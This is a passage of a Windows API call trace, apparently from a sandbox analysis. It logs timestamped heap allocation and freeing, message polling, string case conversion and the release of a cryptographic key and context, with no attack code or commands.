PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0263.857] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0263.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0263.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0263.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0263.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0263.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0263.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0263.857] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0263.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0263.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0263.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0263.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0263.857] CryptDestroyKey (hKey=0xaa5860) returned 1 [0263.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0263.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0263.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0263.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0263.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0263.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0263.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0263.858] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0263.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0263.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0263.858] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0263.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0263.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0263.858] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0263.858] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0263.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0263.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0263.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0263.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0263.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0263.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0263.858] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0263.858] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0263.858] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0263.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0263.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0263.858] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0263.859] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0263.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0263.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0263.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0263.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0263.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0263.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0263.859] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0263.859] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0263.859] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0263.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0263.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0263.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0263.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0263.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0263.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0263.859] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0263.859] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0263.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0263.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0263.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0263.860] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0263.860] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0263.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0263.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0263.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0263.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0263.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0263.860] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0263.860] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0263.860] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0263.860] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0263.860] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0263.860] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0263.861] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0263.861] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.861] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0263.861] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0263.861] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0263.861] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0263.861] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0263.861] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0263.861] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0263.861] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0263.861] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0263.861] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0263.861] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0263.861] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0263.862] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0263.862] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0263.862] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0263.862] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0263.862] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0263.862] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0263.862] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0263.862] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0263.862] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0263.862] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0263.862] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0263.862] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0263.862] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0263.862] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0263.862] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0263.862] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0263.862] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0263.863] CryptReleaseContext (hProv=0xad2be8, dwFlags=0x0) returned 1 [0263.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0263.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0263.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0263.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0263.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0263.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0263.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0263.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0263.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0263.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0263.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0263.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0263.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0263.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0263.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0263.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0263.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0263.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0263.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0263.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0263.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0263.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0263.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0263.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0263.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0263.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0263.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0263.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0263.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0263.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0263.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0263.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0263.864] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0263.864] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0263.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0263.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0263.865] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0263.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0263.865] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0263.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0263.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0263.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0263.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0263.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0263.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0263.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0263.865] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0263.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0263.865] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0263.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0263.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0263.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0263.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0263.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0263.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0263.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0263.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0263.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0263.866] FreeLibrary (hLibModule=0x74d40000) returned 1 [0263.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0263.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0263.866] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0263.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0263.866] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0263.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0263.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0263.866] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0263.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0263.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0263.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0263.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0263.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0263.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0263.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0263.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0263.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0263.867] CloseHandle (hObject=0x2c8) returned 1 [0263.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0263.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0263.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3551008 | out: hHeap=0x25c0000) returned 1 [0263.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0263.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0263.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0263.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0263.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0263.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0263.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0263.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0263.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0263.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0263.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0263.868] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0263.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0263.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0263.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0263.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0263.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0263.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0263.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0263.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0263.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0263.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 